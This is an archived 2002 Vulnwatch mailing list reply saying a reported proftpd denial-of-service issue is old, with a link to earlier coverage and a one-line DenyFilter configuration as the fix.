Vulnwatch mailing list archives

Re: proftpd <=1.2.7rc3 DoS

From: "Kurt Seifried" <listuser () seifried org>
Date: Tue, 10 Dec 2002 11:44:38 -0800

This is so old I can't even find any postings/articles I remember making on
it. Here is one link from early last year:

http://lwn.net/2001/0322/a/proftpd-dos.php3

Check the documentation:

DenyFilter \*.*/

Problem solved.

People should search Google before posting, it's far less embaressing.

Kurt Seifried, kurt () seifried org
A15B BEE5 B391 B9AD B0EF
AEB0 AD63 0B4E AD56 E574
http://seifried.org/security/